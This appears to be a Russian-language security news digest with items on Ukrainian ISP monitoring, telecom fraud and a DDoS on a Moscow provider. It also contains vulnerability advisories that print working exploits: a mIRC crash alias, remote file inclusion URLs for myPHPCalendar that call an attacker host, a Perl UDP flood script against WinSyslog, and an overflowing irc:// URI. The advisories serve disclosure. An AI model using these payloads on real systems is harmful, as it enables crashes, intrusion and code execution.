Мониторинг интернета, который собираются осуществлять властные структуры в соответствии с этим приказом, по мнению ИнАУ, будет нарушать "конституционные права граждан и основные принципы свободы предпринимательской деятельности".

От провайдеров в частности требуется установка спецоборудования, которое бы позволило СБУ осуществлять мониторинг "всей информации, проходящей по их каналам, независимо от того, является ли передаваемая информация собственностью государства или нет".

ИнАУ подчеркивает, что такая мера "дает возможность несанкционированного перехвата личной переписки граждан и конфиденциальной коммерческой информации предприятий" и указывает, что это нарушает требования конституции Украины, закона "О предпринимательстве" и других нормативно-правовых актов.
16

Сеть Интернет породила нелегальный рынок, где сбывается информация, составляющая коммерческую тайну корпораций. По оценкам правоохранительных органов, интерактивные преступники ежегодно крадут информацию более чем на 10 млрд. долл.

Жертвами самой крупной интерактивной кражи информации на сегодняшний день стали сеть MCI и телефонные компании дальней связи, которые терроризировал служащий, работающий под прикрытием анонимности киберпространства. Техник коммутатора MCI Иви Джеймс Лэй (Ivy James Lay), арестованный в г.Гринсборо (штат Северная Каролина), в январе этого года обвинен в краже 60 тыс. номеров талонов на телефонные переговоры и кредитных карт, которые впоследствии использовались хакерами в Германии, Испании и других европейских странах. Лэй, известный в мире хакеров под псевдонимом "Рыцарь тени", получил более четырех лет тюрьмы. Испанский конспиратор Макс Лоурн (Max Louarn) был приговорен к пяти годам и штрафу в 1 млн. долл. В его деле участвовало еще пять человек.

Что могут сделать компании для своей защиты? Эксперты по безопасности рекомендуют тщательно отбирать сотрудников, которым поручается создание брандмауэров.

Большинство компаний, сети которых были выведены из строя киберпреступниками, избегают огласки этих инцидентов. Они боятся дурной славы и новых атак со стороны других хакеров, выискивающих слабые места. Другая потенциальная угроза: судебные иски со стороны акционеров. Компании несут ответственность за ущерб, причиненный бизнесу, и последующее падение стоимости акций, если будет признано, что они пренебрегали мерами безопасности.

Только промышленность сотовой телефонной связи США теряет из-за мошенничества 1,5 млн. долл. в день. Как отмечает Роберт Фрил (Robert Friel), особый агент отдела электронных преступлений правительственной службы Secret Service (Вашингтон), с учетом потерь компаний междугородной телефонной связи ежегодные общие убытки составляют 4 - 5 млрд. долл.

Конечно, в краже коммерческих секретов с использованием Интернет нет ничего нового. Но Интернет и другие интерактивные службы открывают торговцам информацией новые возможности для поиска и обмена данными. Именно в этой сфере будут сосредоточены большинство преступлений в XXI веке. Когда речь идет о технологиях, преступники всегда оказываются на один шаг впереди.
17

Программа: mIRC version 6.11 и более ранние версии Опасность: Средняя Наличие эксплоита: Да Описание: Уязвимость обнаружена в mIRC. Удаленный атакующий может аварийно завершить работу клиента. Удаленный атакующий может послать специально обработанны DCC запрос, чтобы аварийно завершить работу клиента. Пример/Эксплоит: mIRC alias: /crash { .raw PRIVMSG $1 $+(:,$chr(1),DCC) send " $+ $str($rand(a,z) $+ $chr(32),250) $+ " 0 2130706433 $+(8192,$chr(1)) } URL производителя: http://www.mirc.co.uk/ Решение: Установите последнюю версию клиента: http://www.mirc.co.uk/get.html

[Full-Disclosure] Mirc Dos 6.11 and below

Программа: myPHPCalendar 10192000 Build 1 Beta Опасность: Высокая Наличие эксплоита: Да Описание: Уязвимость обнаружена в myPHPCalendar. Удаленный атакующий может выполнить произвольный PHP код, включая команды операционной системы, на целевой системе. Сценарии 'admin.php', 'contacts.php', и 'convert-date.php' включают файлы из $cal_dir каталога. Удаленный пользователь может определить удаленное местоположение для $cal_dir каталога, чтобы включить и выполнить произвольный PHP сценарий на целевом сервере. Пример/Эксплоит: http://[target]/admin.php?cal_dir=http://[attacker]/ http://[target]/contacts.php? cal_dir=http://[attacker]/ http://[target]/convert-date.php?cal_dir=http://[attacker]/ , где http://[attacker]/vars.inc http://[attacker]/prefs.inc URL производителя: http://myphpcalendar.sourceforge.net/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. Неофициальное исправление можно скачать отюда: http://www.phpsecure.info/

myPHPCalendar

Программа: WinSyslog version 4.21 SP1

Опасность: Средняя

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в WinSyslog. Удаленный атакующий может заверсить работу приложения и системы.

Удаленный атакующий может послать чрезмерно длинное сообщение к WinSyslog программе, чтобы завесить работу WinSyslog и операционной системы.

Пример/Эксплоит:

#!/usr/bin/perl
#WinSyslog System Freeze Vulnerability

use IO::Socket;
$host = "192.168.1.44";
$port = "10514";
$data = "A";

$socket = IO::Socket::INET->new(Proto => "udp") or die "Socket error: 
$@\n";
$ipaddr = inet_aton($host) || $host;
$portaddr = sockaddr_in($port, $ipaddr);

for ($count = 0; $count < 1000; $count ++)
{
$buf = "";
$buf .= "A"x((600+$count)*4);

print "Length: ", length($buf), "\n";
send($socket, $buf, 0, $portaddr);
print "sent\n";
}

print "Done\n";

URL производителя:http://WinSyslog.com

Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время. Ограничьте доступ к программе только из доверенных IP адресов.

Программа: mIRC version 6.1

Опасность: Средняя

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в mIRC. Злонамеренный атакующий может выполнить произвольный код на системе пользователя.

Уязвимость связанна с ошибкой проверки границ в URI обработчике "irc:". Удаленный атакующий может представить специально обработанное, чрезмерно длинное имя хоста, чтобы вызвать переполнение буфера и выполнить произвольный код на системе пользователя.

Пример/Эксплоит:

irc://[AAAA...[x998]...AAAA

URL производителя:http://www.mirc.com/get.html

Решение: Установите обновленную версию программы (6.11): http://www.mirc.com/get.html

В течение 10 часов прошедшим вечером московский провайдер Зенон Н.С.П. подвергался атаке неизвестных хакеров. Результатом подобных действий, стала частичная, а временами и полная, недоступность ряда интернет-ресурсов, расположенных на технологических площадках Зенона.

По некоторой информации, целью атаки был виртуальный хостинг и электронная почта провайдера. Однако из-за перегруженности каналов связи Зенона недоступны были все сайты, размещенные у провайдера. Более того, атака оказала влияние и на других провайдеров, в частности на тех, у которых Зенон Н.С.П. арендует каналы связи.

По состоянию на час ночи 15 октября его сотрудникам практически целиком удалось справиться с последствиями атаки, и все проекты, находящиеся на хостинге в Зеноне, функционируют нормально.

По неподтвержденной информации, расследованием инцидента займется Управление "K" МВД РФ.